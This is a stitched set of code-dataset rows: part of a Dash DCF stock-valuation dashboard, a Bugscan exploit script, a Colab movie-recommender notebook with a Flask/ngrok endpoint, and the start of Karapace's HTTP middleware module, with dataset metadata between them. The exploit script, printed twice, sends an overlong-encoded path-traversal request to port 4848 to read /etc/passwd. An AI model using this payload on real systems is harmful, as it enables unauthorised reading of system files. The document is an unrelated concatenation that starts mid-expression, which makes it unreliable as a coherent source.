For now, enter ERP:'), html.Br(), dbc.Label("Equity Risk Premium (%)", html_for="erp-calculated"), dbc.Input(id="erp-calculated", type="number", value=6, min=0, max=10, step=0.01, placeholder="Enter number", debounce=True ), ]), label="ERP Calculation", tab_id="tab-erp", label_style={"color": "#00AEF9"} ), ], id="company-tabs", active_tab="tab-lever", )) ]), dbc.Col([ make_card('DCF Inputs - Environmental factors', 'info', dbc.Form([ dbc.Label("Effective Tax Rate (%) (select range: 0 to 30)", html_for="tax-rate"), dcc.Slider(id="tax-rate", min=0, max=30, step=0.1, value=15, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 35, 5)}), dbc.Label("Riskfree Rate (%) (select range: 0 to 5)", html_for="riskfree-rate"), dcc.Slider(id="riskfree-rate", min=0, max=5, step=0.25, value=1.25, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}), dbc.Label("Terminal Growth Rate (%) (select range: 0 to 5)", html_for="terminal-growth-rate"), dcc.Slider(id="terminal-growth-rate", min=0, max=5, step=0.25, value=3.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 6)}, disabled=False), dbc.Label("Cost of Capital / Discount Rate (%) (select range: 0 to 15)", html_for="cost-of-cap"), dcc.Slider(id="cost-of-cap", min=0, max=15, step=0.25, value=8.5, tooltip={'always_visible': True, 'placement': 'topRight'}, marks={v: str(v) for v in range(0, 16)}), ])), make_card('DCF Outputs', 'success', dbc.Spinner(html.Div(id="dcf-data"))) ]), ]), #row 1 # Element for Graph plot of KPIndicators dbc.Row([ dbc.Col([ make_card("Past records Financial table (Current Year is TTM/MRQ) ", "secondary", dbc.Spinner(html.Div(id="fin-table"))), html.Small([html.A('Data source: Marketwatch.com', href='https://www.marketwatch.com/investing/stock/aapl/financials'), html.P('Copyright 2020 FactSet Research Systems Inc. All rights reserved. 
Source FactSet Fundamentals'), ]) ]), dbc.Col([html.Div([ html.H6('Select Parameter(s) to show trend over the past periods'), dcc.Dropdown( id='select-column', value=['ROCE(%)', 'Sales-to-Capital(%)', 'Net Profit Margin(%)', 'Revenue Growth(%)'], multi=True ), dbc.Spinner(dcc.Graph( id='plot-indicators' ))]) ]), ]), # row 2 dbc.Row([ dbc.Col(make_card("Current Year Input (Use Latest 10K/10Q to Override)", "warning", get_dcf_current_year_input_overrides()) ), dbc.Col(make_card("Other Input Overrides", "warning", [get_other_input_overrides(), html.Br(), dcc.Markdown(children=''' **Other Assumptions for Intrinsic Value DCF Valuation:**\n 1. TERMINAL_YEAR_LENGTH = 10 2. No Preferred stock/dividends in capital structure (you can override this) 3. No Convertible debt/equity portion in capital structure (you can override this) '''), dbc.Button("Run DCF calculation again with overrides", id='run-dcf', color='primary', block=True), make_card("DCF table (2-stage Terminal value after 10 years) ", "secondary", dbc.Spinner(html.Div(id="dcf-table"))) ])), dbc.Col([ make_card("Notes/Commentary", "primary", dbc.Textarea(bs_size="lg", placeholder='Enter your notes and commentary on the analysis') ) ]) ],form=True), # row 3 dbc.Row([ dbc.Col([ ]), ]), # row 4 dbc.Row([dbc.Col( # MD text area Element for interpretation and analysis of data dcc.Markdown(children=source_credits + assumptions + disclaimer) ) ]) # footer row ]) sectorlayout = html.Div([ navheader, # html.H3('Sector Value Analysis'), # MD text area Element for Introduction dbc.Row([dbc.Col( [dcc.Markdown(children=''' ### Find the best picks in the sector! ### ''' )], ), ]), # heading row html.Div(id='sector-app-display-value', children="Under Construction! Features may change without notice!", style={'backgroundColor': 'red', 'fontSize': '200%'}), html.Br(), dbc.NavLink('IEX Cloud is the easiest way to use financial data. 
Get started now by clicking this referral link!', href="https://iexcloud.io/s/b47b5006"), html.Br(), html.P("Please note that sandbox test response data shown below from IEX Cloud Sandbox APIs is purposefully manipulated to scramble values and is not suitable for production usage. Data returned in the sandbox will look real, but strings are scrambled, dates are manipulated, and numbers are changed.", style={'color': 'red'}), dbc.NavLink('See this link for more information on Sandbox Testing', href="https://iexcloud.io/docs/api/#testing-sandbox"), html.Br(), dcc.Store(id='sector-store'), # Element for Graph plot of Sector Picks dbc.Row([ dbc.Col([html.Div([ html.H5('Select Sector(s): '), dcc.Dropdown( id='select-sector', options=[{'label': i, 'value': i} for i in ["Electronic Technology", "Distribution Services", "Health Technology", "Commercial Services", "Industrial Services", "Finance", "Process Industries", "Transportation", "Technology Services", "Producer Manufacturing", "Retail Trade", "Consumer Services", "Non-Energy Minerals", "Utilities", "Miscellaneous", "Health Services", "Consumer Durables", "Consumer Non-Durables", "Communications", "Energy Minerals", "Government"]], value=["Electronic Technology", "Health Technology", "Technology Services"], multi=True ), ]) ]), ]), # row 1 dbc.Row([ dbc.Col([ html.Br(), dcc.Dropdown( id='select-company', value=[], multi=True, placeholder='Filter to one or more companies, start typing in dropdown' ), dbc.Label("Filter by Enterprise Value (in billions)", html_for="sector-ev-filter"), dcc.RangeSlider(id="sector-ev-filter", min=7, max=13, step=0.001, value=[8, 12.699], marks={i: str(10 ** (i-9))+'B' for i in range(7, 14)}, updatemode='drag', ), html.H5('Crossfilter-Yaxis'), dcc.Dropdown( id='crossfilter-yaxis-column', value='EBITDAToRevenueMargin', ), ], width=3), dbc.Col([ dbc.NavLink('Data provided by IEX Cloud', href="https://iexcloud.io"), dbc.Spinner(dcc.Graph(id='sector-distribution' )), 
html.H5('Crossfilter-Xaxis'), dcc.Dropdown( id='crossfilter-xaxis-column', value='EBITDAToEV(%)', ), html.H5('Workaround: IEX Data is unreliable, so can change to Market Cap for filtering, analysis instead of preferred method using Enterprise Value (which includes Debt leverage)'), html.Br(), html.H5('If graph is blank, IEX Data has been filtered out due to NAs') ]) ]), # row 2 dbc.Row([dbc.Col( # MD text area Element for footer dcc.Markdown(children=disclaimer) ) ]) # footer row ])
en
0.639522
# Local imports # Reference and some Dashboard components inspired by: https://medium.com/swlh/how-to-create-a-dashboard-to-dominate-the-stock-market-using-python-and-dash-c35a12108c93 # html.H3('DCF Valuation Analysis'), # MD text area Element for Introduction ### Purpose of this web app ### ##### To be one of the tools to educate and democratize fundamentals DCF (Discounted Cash Flow) Valuation Analysis of public equity investments ##### See below for more details, Assumptions and Disclaimer or visit [About this DCF Valuation App](https://codepatel.github.io/dcf/) # heading row # dbc.Select( # id='ticker-input', # options=[{'label': s['symbol']+'('+s['exchange']+'):'+s['name'], 'value': s['symbol']} for s in symdata], # value='AAPL', # placeholder='Start typing Ticker, press Enter'), # in milliseconds #row 1 # Element for Graph plot of KPIndicators # row 2 **Other Assumptions for Intrinsic Value DCF Valuation:**\n 1. TERMINAL_YEAR_LENGTH = 10 2. No Preferred stock/dividends in capital structure (you can override this) 3. No Convertible debt/equity portion in capital structure (you can override this) # row 3 # row 4 # MD text area Element for interpretation and analysis of data # footer row # html.H3('Sector Value Analysis'), # MD text area Element for Introduction ### Find the best picks in the sector! ### # heading row #testing-sandbox"), # Element for Graph plot of Sector Picks # row 1 # row 2 # MD text area Element for footer # footer row
2.027479
2
Bugscan_exploits-master/exp_list/exp-2426.py
csadsl/poc_exp
11
6627940
#!/usr/bin/env python # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595 import urlparse def assign(service, arg): if service == "www": r = urlparse.urlparse(arg) return True, 'https://%s:4848/' %(r.netloc) def audit(arg): payload = 'theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' code, head, res, errcode, _ = curl.curl2(arg + payload) if code == 200 and '/bin/bash' in res: security_hole(arg+payload) if __name__ == '__main__': from dummy import * audit(assign('www', 'https://172.16.17.32/')[1])
#!/usr/bin/env python # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595 import urlparse def assign(service, arg): if service == "www": r = urlparse.urlparse(arg) return True, 'https://%s:4848/' %(r.netloc) def audit(arg): payload = 'theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd' code, head, res, errcode, _ = curl.curl2(arg + payload) if code == 200 and '/bin/bash' in res: security_hole(arg+payload) if __name__ == '__main__': from dummy import * audit(assign('www', 'https://172.16.17.32/')[1])
en
0.198952
#!/usr/bin/env python # refer:http://www.wooyun.org/bugs/wooyun-2010-0144595
2.322156
2
models/latent_vector_collaborative_recommend_forserver.py
doritos0812/deep-learning-project-platform
2
6627941
# -*- coding: utf-8 -*- """Latent_Vector_Collaborative_Recommend_forServer.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/15QsNrUfOFlIBW_rCJoE399hayVUqN3XX """ from sklearn.decomposition import TruncatedSVD from scipy.sparse.linalg import svds import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np import warnings warnings.filterwarnings("ignore") import os, sys from google.colab import drive ### 해당 코드 실행 시 colab에서 실행중인 폴더의 /content/drive/My Drive가 구글 드라이브에 연결됨 drive.mount('/content/drive') # 데이터셋 불러오기(MovieLens 100k) rating_data = pd.read_csv('drive/MyDrive/data/others/ratings.csv') # 평점 데이터셋 형태 확인 print("### Rating Dataset Format ###", end='\n\n') print(rating_data.head(), end='\n\n\n') rating_data.drop(['timestamp'], axis=1, inplace=True) movie_data = pd.read_csv('drive/MyDrive/data/others/movies.csv') # 영화 데이터셋 형태 확인 print("### Movie Dataset Format ###", end = '\n\n') print("Columns of Movie Dataset : ",movie_data.columns, end = '\n\n') print(movie_data.head()) print(movie_data.shape) print(rating_data.shape) movie_data.drop('genres', axis = 1, inplace = True) user_movie_data = pd.merge(rating_data, movie_data, on = 'movieId') user_movie_data.head() user_movie_data.shape user_movie_rating = user_movie_data.pivot_table('rating', index = 'userId', columns='title').fillna(0) user_movie_rating.shape user_movie_rating.head() movie_user_rating = user_movie_rating.values.T movie_user_rating.shape type(movie_user_rating) SVD = TruncatedSVD(n_components=12) matrix = SVD.fit_transform(movie_user_rating) matrix.shape matrix[0] corr = np.corrcoef(matrix) corr.shape corr2 = corr[:200, :200] corr2.shape plt.figure(figsize=(16, 10)) sns.heatmap(corr2) def get_recommend_movie_list(movie_name, top=20): # 특정 영화와 비슷한 영화를 추천해야 하기 때문에 '특정 영화' 정보를 뽑아낸다. 
movie_title = user_movie_rating.columns movie_title_list = list(movie_title) coffey_hands = movie_title_list.index(movie_name) corr_coffey_hands = corr[coffey_hands] #본인을 제외, Score 순으로 Sort, 역순으로 뒤집기 corr_coffey_hands = corr_coffey_hands.argsort()[:-1][::-1] #list으로 만들고 top 개수만큰 뽑아준 뒤 return result = list(movie_title[corr_coffey_hands])[:top] result = [x.split(' (')[0] for x in result] return result rec2 = get_recommend_movie_list('Avatar (2009)') rec2 from pandas import DataFrame df = DataFrame(rec2,columns=['title']) df import requests from urllib.request import urlopen from PIL import Image def movie_poster(titles): data_URL = 'http://www.omdbapi.com/?i=tt3896198&apikey=<KEY>' fig, axes = plt.subplots(2, 10, figsize=(30,9)) for i, ax in enumerate(axes.flatten()): w_title = titles[i].strip().split() params = { 's':titles[i], 'type':'movie', 'y':'' } response = requests.get(data_URL,params=params).json() if response["Response"] == 'True': poster_URL = response["Search"][0]["Poster"] img = Image.open(urlopen(poster_URL)) ax.imshow(img) ax.axis("off") if len(w_title) >= 10: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:10])}\n{' '.join(w_title[10:])}", fontsize=10) elif len(w_title) >= 5: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:])}", fontsize=10) else: ax.set_title(f"{i+1}. {titles[i]}", fontsize=10) plt.show() movie_poster(rec2) !pip install flask_cors !pip install flask-ngrok import io from flask_ngrok import run_with_ngrok from flask import Flask, jsonify, request from PIL import Image from flask_cors import CORS, cross_origin import os import json # 이미지를 읽어 결과를 반환하는 함수 def get_prediction(title): rec2 = get_recommend_movie_list(title) rec2 = DataFrame(rec2,columns=['title']) rec2 = rec2['title'].apply(lambda x : x.split(' (')[0]) # 이부분 필요없음. 근데 dataframe에서 apply 해줘야 [[],[]] 형태가 안생김. 
이유는 모르겠음 return rec2.to_json(orient="split") app = Flask(__name__) CORS(app) @app.route('/post', methods=['POST']) def predict(): content = request.get_json(force=True, silent=True) print("title:", content['title']) title=content['title'] year=content['year'] input = title+' ('+year+')' print("input", input) #processing title if request.method == 'POST': #받은 데이터 처리 res = get_prediction(input) print("결과:", res) return jsonify(res) run_with_ngrok(app) app.run()
# -*- coding: utf-8 -*- """Latent_Vector_Collaborative_Recommend_forServer.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/15QsNrUfOFlIBW_rCJoE399hayVUqN3XX """ from sklearn.decomposition import TruncatedSVD from scipy.sparse.linalg import svds import matplotlib.pyplot as plt import seaborn as sns import pandas as pd import numpy as np import warnings warnings.filterwarnings("ignore") import os, sys from google.colab import drive ### 해당 코드 실행 시 colab에서 실행중인 폴더의 /content/drive/My Drive가 구글 드라이브에 연결됨 drive.mount('/content/drive') # 데이터셋 불러오기(MovieLens 100k) rating_data = pd.read_csv('drive/MyDrive/data/others/ratings.csv') # 평점 데이터셋 형태 확인 print("### Rating Dataset Format ###", end='\n\n') print(rating_data.head(), end='\n\n\n') rating_data.drop(['timestamp'], axis=1, inplace=True) movie_data = pd.read_csv('drive/MyDrive/data/others/movies.csv') # 영화 데이터셋 형태 확인 print("### Movie Dataset Format ###", end = '\n\n') print("Columns of Movie Dataset : ",movie_data.columns, end = '\n\n') print(movie_data.head()) print(movie_data.shape) print(rating_data.shape) movie_data.drop('genres', axis = 1, inplace = True) user_movie_data = pd.merge(rating_data, movie_data, on = 'movieId') user_movie_data.head() user_movie_data.shape user_movie_rating = user_movie_data.pivot_table('rating', index = 'userId', columns='title').fillna(0) user_movie_rating.shape user_movie_rating.head() movie_user_rating = user_movie_rating.values.T movie_user_rating.shape type(movie_user_rating) SVD = TruncatedSVD(n_components=12) matrix = SVD.fit_transform(movie_user_rating) matrix.shape matrix[0] corr = np.corrcoef(matrix) corr.shape corr2 = corr[:200, :200] corr2.shape plt.figure(figsize=(16, 10)) sns.heatmap(corr2) def get_recommend_movie_list(movie_name, top=20): # 특정 영화와 비슷한 영화를 추천해야 하기 때문에 '특정 영화' 정보를 뽑아낸다. 
movie_title = user_movie_rating.columns movie_title_list = list(movie_title) coffey_hands = movie_title_list.index(movie_name) corr_coffey_hands = corr[coffey_hands] #본인을 제외, Score 순으로 Sort, 역순으로 뒤집기 corr_coffey_hands = corr_coffey_hands.argsort()[:-1][::-1] #list으로 만들고 top 개수만큰 뽑아준 뒤 return result = list(movie_title[corr_coffey_hands])[:top] result = [x.split(' (')[0] for x in result] return result rec2 = get_recommend_movie_list('Avatar (2009)') rec2 from pandas import DataFrame df = DataFrame(rec2,columns=['title']) df import requests from urllib.request import urlopen from PIL import Image def movie_poster(titles): data_URL = 'http://www.omdbapi.com/?i=tt3896198&apikey=<KEY>' fig, axes = plt.subplots(2, 10, figsize=(30,9)) for i, ax in enumerate(axes.flatten()): w_title = titles[i].strip().split() params = { 's':titles[i], 'type':'movie', 'y':'' } response = requests.get(data_URL,params=params).json() if response["Response"] == 'True': poster_URL = response["Search"][0]["Poster"] img = Image.open(urlopen(poster_URL)) ax.imshow(img) ax.axis("off") if len(w_title) >= 10: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:10])}\n{' '.join(w_title[10:])}", fontsize=10) elif len(w_title) >= 5: ax.set_title(f"{i+1}. {' '.join(w_title[:5])}\n{' '.join(w_title[5:])}", fontsize=10) else: ax.set_title(f"{i+1}. {titles[i]}", fontsize=10) plt.show() movie_poster(rec2) !pip install flask_cors !pip install flask-ngrok import io from flask_ngrok import run_with_ngrok from flask import Flask, jsonify, request from PIL import Image from flask_cors import CORS, cross_origin import os import json # 이미지를 읽어 결과를 반환하는 함수 def get_prediction(title): rec2 = get_recommend_movie_list(title) rec2 = DataFrame(rec2,columns=['title']) rec2 = rec2['title'].apply(lambda x : x.split(' (')[0]) # 이부분 필요없음. 근데 dataframe에서 apply 해줘야 [[],[]] 형태가 안생김. 
이유는 모르겠음 return rec2.to_json(orient="split") app = Flask(__name__) CORS(app) @app.route('/post', methods=['POST']) def predict(): content = request.get_json(force=True, silent=True) print("title:", content['title']) title=content['title'] year=content['year'] input = title+' ('+year+')' print("input", input) #processing title if request.method == 'POST': #받은 데이터 처리 res = get_prediction(input) print("결과:", res) return jsonify(res) run_with_ngrok(app) app.run()
ko
0.968688
# -*- coding: utf-8 -*- Latent_Vector_Collaborative_Recommend_forServer.ipynb Automatically generated by Colaboratory. Original file is located at https://colab.research.google.com/drive/15QsNrUfOFlIBW_rCJoE399hayVUqN3XX ### 해당 코드 실행 시 colab에서 실행중인 폴더의 /content/drive/My Drive가 구글 드라이브에 연결됨 # 데이터셋 불러오기(MovieLens 100k) # 평점 데이터셋 형태 확인 ## Rating Dataset Format ###", end='\n\n') # 영화 데이터셋 형태 확인 ## Movie Dataset Format ###", end = '\n\n') # 특정 영화와 비슷한 영화를 추천해야 하기 때문에 '특정 영화' 정보를 뽑아낸다. #본인을 제외, Score 순으로 Sort, 역순으로 뒤집기 #list으로 만들고 top 개수만큰 뽑아준 뒤 return # 이미지를 읽어 결과를 반환하는 함수 # 이부분 필요없음. 근데 dataframe에서 apply 해줘야 [[],[]] 형태가 안생김. 이유는 모르겠음 #processing title #받은 데이터 처리
2.686142
3
karapace/rapu.py
hackaugusto/karapace
0
6627942
<gh_stars>0 """ karapace - Custom middleware system on top of `aiohttp` implementing HTTP server and client components for use in Aiven's REST applications. Copyright (c) 2019 Aiven Ltd See LICENSE for details """ from karapace.statsd import StatsClient from karapace.utils import json_encode from karapace.version import __version__ from typing import Dict, Optional from vendor.python_accept_types.accept_types import get_best_match import aiohttp import aiohttp.web import aiohttp_socks import async_timeout import asyncio import cgi import hashlib import json as jsonlib import logging import re import ssl import time SERVER_NAME = "Karapace/{}".format(__version__) SCHEMA_CONTENT_TYPES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", "application/octet-stream", ] SCHEMA_ACCEPT_VALUES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", ] # TODO -> accept more general values as well REST_CONTENT_TYPE_RE = re.compile( r"application/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?" 
r"\+(?P<serialization_format>json))|(?P<general_format>json|octet-stream))" ) REST_ACCEPT_RE = re.compile( r"(application|\*)/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?\+" r"(?P<serialization_format>json))|(?P<general_format>json|\*))" ) class HTTPRequest: def __init__( self, *, url: str, query, headers: Dict[str, str], path_for_stats: str, method: str, content_type: Optional[str] = None, accepts: Optional[str] = None, ): self.url = url self.headers = headers self._header_cache: Dict[str, Optional[str]] = {} self.query = query self.content_type = content_type self.accepts = accepts self.path_for_stats = path_for_stats self.method = method self.json = None def get_header(self, header: str, default_value: Optional[str] = None) -> Optional[str]: upper_cased = header.upper() if upper_cased in self._header_cache: return self._header_cache[upper_cased] for h in self.headers.keys(): if h.upper() == upper_cased: value = self.headers[h] self._header_cache[upper_cased] = value return value if upper_cased == "CONTENT-TYPE": # sensible default self._header_cache[upper_cased] = "application/json" else: self._header_cache[upper_cased] = default_value return self._header_cache[upper_cased] def __repr__(self): return "HTTPRequest(url=%s query=%s method=%s json=%r)" % (self.url, self.query, self.method, self.json) class HTTPResponse(Exception): """A custom Response object derived from Exception so it can be raised in response handler callbacks.""" def __init__(self, body, *, status: int = 200, content_type: Optional[str] = None, headers: Dict[str, str] = None): self.body = body self.status = status self.headers = dict(headers) if headers else {} if isinstance(body, (dict, list)): self.headers["Content-Type"] = "application/json" self.json = body else: self.json = None if content_type: self.headers["Content-Type"] = content_type super().__init__("HTTPResponse {}".format(status)) def ok(self): if self.status < 200 or self.status >= 
300: return False return True def __repr__(self): return f"HTTPResponse(status={self.status} body={self.body})" def http_error(message, content_type, code): raise HTTPResponse( body=json_encode({ "error_code": code, "message": message, }, binary=True), headers={"Content-Type": content_type}, status=code, ) class RestApp: def __init__(self, *, app_name, sentry_config): self.app_name = app_name self.app_request_metric = "{}_request".format(app_name) self.app = aiohttp.web.Application() self.app.on_startup.append(self.create_http_client) self.app.on_cleanup.append(self.cleanup_http_client) self.http_client_v = None self.http_client_no_v = None self.log = logging.getLogger(self.app_name) self.stats = StatsClient(sentry_config=sentry_config) self.raven_client = self.stats.raven_client self.app.on_cleanup.append(self.cleanup_stats_client) async def cleanup_stats_client(self, app): # pylint: disable=unused-argument self.stats.close() async def create_http_client(self, app): # pylint: disable=unused-argument no_v_conn = aiohttp.TCPConnector(ssl=False) self.http_client_no_v = aiohttp.ClientSession(connector=no_v_conn, headers={"User-Agent": SERVER_NAME}) self.http_client_v = aiohttp.ClientSession(headers={"User-Agent": SERVER_NAME}) async def cleanup_http_client(self, app): # pylint: disable=unused-argument if self.http_client_no_v: await self.http_client_no_v.close() if self.http_client_v: await self.http_client_v.close() @staticmethod def cors_and_server_headers_for_request(*, request, origin="*"): # pylint: disable=unused-argument return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Methods": "DELETE, GET, OPTIONS, POST, PUT", "Access-Control-Allow-Headers": "Authorization, Content-Type", "Server": SERVER_NAME, } def check_rest_headers(self, request: HTTPRequest): # pylint: disable=R1710 method = request.method default_content = "application/vnd.kafka.json.v2+json" default_accept = "*/*" result = {"content_type": default_content} content_matcher = 
REST_CONTENT_TYPE_RE.search( cgi.parse_header(request.get_header("Content-Type", default_content))[0] ) accept_matcher = REST_ACCEPT_RE.search(cgi.parse_header(request.get_header("Accept", default_accept))[0]) if method in {"POST", "PUT"}: if not content_matcher: http_error("HTTP 415 Unsupported Media Type", result["content_type"], 415) if content_matcher and accept_matcher: header_info = content_matcher.groupdict() header_info["embedded_format"] = header_info.get("embedded_format") or "binary" result["requests"] = header_info result["accepts"] = accept_matcher.groupdict() return result self.log.error("Not acceptable: %r", request.get_header("accept")) http_error("HTTP 406 Not Acceptable", result["content_type"], 406) def check_schema_headers(self, request: HTTPRequest): method = request.method response_default_content_type = "application/vnd.schemaregistry.v1+json" if method in {"POST", "PUT"} and cgi.parse_header(request.get_header("Content-Type"))[0] not in SCHEMA_CONTENT_TYPES: http_error("HTTP 415 Unsupported Media Type", response_default_content_type, 415) accept_val = request.get_header("Accept") if accept_val: if accept_val == "*/*" or accept_val.startswith("*/"): return response_default_content_type content_type_match = get_best_match(accept_val, SCHEMA_ACCEPT_VALUES) if not content_type_match: self.log.debug("Unexpected Accept value: %r", accept_val) http_error("HTTP 406 Not Acceptable", response_default_content_type, 406) return content_type_match return response_default_content_type async def _handle_request( self, *, request, path_for_stats, callback, schema_request=False, callback_with_request=False, json_request=False, rest_request=False ): start_time = time.monotonic() resp = None rapu_request = HTTPRequest( headers=request.headers, query=request.query, method=request.method, url=request.url, path_for_stats=path_for_stats, ) try: if request.method == "OPTIONS": origin = request.headers.get("Origin") if not origin: raise HTTPResponse(body="OPTIONS 
missing Origin", status=400) headers = self.cors_and_server_headers_for_request(request=rapu_request, origin=origin) raise HTTPResponse(body=b"", status=200, headers=headers) body = await request.read() if json_request: if not body: raise HTTPResponse(body="Missing request JSON body", status=400) try: _, options = cgi.parse_header(rapu_request.get_header("Content-Type")) charset = options.get("charset", "utf-8") body_string = body.decode(charset) rapu_request.json = jsonlib.loads(body_string) except jsonlib.decoder.JSONDecodeError: raise HTTPResponse(body="Invalid request JSON body", status=400) except UnicodeDecodeError: raise HTTPResponse(body=f"Request body is not valid {charset}", status=400) except LookupError: raise HTTPResponse(body=f"Unknown charset {charset}", status=400) else: if body not in {b"", b"{}"}: raise HTTPResponse(body="No request body allowed for this operation", status=400) callback_kwargs = dict(request.match_info) if callback_with_request: callback_kwargs["request"] = rapu_request if rest_request: params = self.check_rest_headers(rapu_request) if "requests" in params: rapu_request.content_type = params["requests"] params.pop("requests") if "accepts" in params: rapu_request.accepts = params["accepts"] params.pop("accepts") callback_kwargs.update(params) if schema_request: content_type = self.check_schema_headers(rapu_request) callback_kwargs["content_type"] = content_type try: data = await callback(**callback_kwargs) status = 200 headers = {} except HTTPResponse as ex: data = ex.body status = ex.status headers = ex.headers except: # pylint: disable=bare-except self.log.exception("Internal server error") data = {"error_code": 500, "message": "Internal server error"} status = 500 headers = {} headers.update(self.cors_and_server_headers_for_request(request=rapu_request)) if isinstance(data, (dict, list)): resp_bytes = json_encode(data, binary=True, sort_keys=True, compact=True) elif isinstance(data, str): if "Content-Type" not in headers: 
headers["Content-Type"] = "text/plain; charset=utf-8" resp_bytes = data.encode("utf-8") else: resp_bytes = data # On 204 - NO CONTENT there is no point of calculating cache headers if 200 >= status <= 299: if resp_bytes: etag = '"{}"'.format(hashlib.md5(resp_bytes).hexdigest()) else: etag = '""' if_none_match = request.headers.get("if-none-match") if if_none_match and if_none_match.replace("W/", "") == etag: status = 304 resp_bytes = b"" headers["access-control-expose-headers"] = "etag" headers["etag"] = etag resp = aiohttp.web.Response(body=resp_bytes, status=status, headers=headers) except HTTPResponse as ex: if isinstance(ex.body, str): resp = aiohttp.web.Response(text=ex.body, status=ex.status, headers=ex.headers) else: resp = aiohttp.web.Response(body=ex.body, status=ex.status, headers=ex.headers) except asyncio.CancelledError: self.log.debug("Client closed connection") raise except Exception as ex: # pylint: disable=broad-except self.stats.unexpected_exception(ex=ex, where="rapu_wrapped_callback") self.log.exception("Unexpected error handling user request: %s %s", request.method, request.url) resp = aiohttp.web.Response(text="Internal Server Error", status=500) finally: self.stats.timing( self.app_request_metric, time.monotonic() - start_time, tags={ "path": path_for_stats, # no `resp` means that we had a failure in exception handler "result": resp.status if resp else 0, "method": request.method, } ) return resp def route(self, path, *, callback, method, schema_request=False, with_request=None, json_body=None, rest_request=False): # pretty path for statsd reporting path_for_stats = re.sub(r"<[\w:]+>", "x", path) # bottle compatible routing aio_route = path aio_route = re.sub(r"<(\w+):path>", r"{\1:.+}", aio_route) aio_route = re.sub(r"<(\w+)>", r"{\1}", aio_route) if (method in {"POST", "PUT"}) and with_request is None: with_request = True if with_request and json_body is None: json_body = True async def wrapped_callback(request): return await 
self._handle_request( request=request, path_for_stats=path_for_stats, callback=callback, schema_request=schema_request, callback_with_request=with_request, json_request=json_body, rest_request=rest_request ) async def wrapped_cors(request): return await self._handle_request( request=request, path_for_stats=path_for_stats, callback=None, ) if not aio_route.endswith("/"): self.app.router.add_route(method, aio_route + "/", wrapped_callback) self.app.router.add_route(method, aio_route, wrapped_callback) else: self.app.router.add_route(method, aio_route, wrapped_callback) self.app.router.add_route(method, aio_route[:-1], wrapped_callback) try: self.app.router.add_route("OPTIONS", aio_route, wrapped_cors) except RuntimeError as ex: if "Added route will never be executed, method OPTIONS is already registered" not in str(ex): raise async def http_request(self, url, *, method="GET", json=None, timeout=10.0, verify=True, proxy=None): close_session = False if isinstance(verify, str): sslcontext = ssl.create_default_context(cadata=verify) else: sslcontext = None if proxy: connector = aiohttp_socks.SocksConnector( socks_ver=aiohttp_socks.SocksVer.SOCKS5, host=proxy["host"], port=proxy["port"], username=proxy["username"], password=proxy["password"], rdns=False, verify_ssl=verify, ssl_context=sslcontext, ) session = aiohttp.ClientSession(connector=connector) close_session = True elif sslcontext: conn = aiohttp.TCPConnector(ssl_context=sslcontext) session = aiohttp.ClientSession(connector=conn) close_session = True elif verify is True: session = self.http_client_v elif verify is False: session = self.http_client_no_v else: raise ValueError("invalid arguments to http_request") func = getattr(session, method.lower()) try: with async_timeout.timeout(timeout): async with func(url, json=json) as response: if response.headers.get("content-type", "").startswith("application/json"): resp_content = await response.json() else: resp_content = await response.text() result = 
HTTPResponse(body=resp_content, status=response.status) finally: if close_session: await session.close() return result def run(self, *, host, port): aiohttp.web.run_app( app=self.app, host=host, port=port, access_log_format='%Tfs %{x-client-ip}i "%r" %s "%{user-agent}i" response=%bb request_body=%{content-length}ib', ) def add_routes(self): pass # Override in sub-classes
""" karapace - Custom middleware system on top of `aiohttp` implementing HTTP server and client components for use in Aiven's REST applications. Copyright (c) 2019 Aiven Ltd See LICENSE for details """ from karapace.statsd import StatsClient from karapace.utils import json_encode from karapace.version import __version__ from typing import Dict, Optional from vendor.python_accept_types.accept_types import get_best_match import aiohttp import aiohttp.web import aiohttp_socks import async_timeout import asyncio import cgi import hashlib import json as jsonlib import logging import re import ssl import time SERVER_NAME = "Karapace/{}".format(__version__) SCHEMA_CONTENT_TYPES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", "application/octet-stream", ] SCHEMA_ACCEPT_VALUES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", ] # TODO -> accept more general values as well REST_CONTENT_TYPE_RE = re.compile( r"application/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?" 
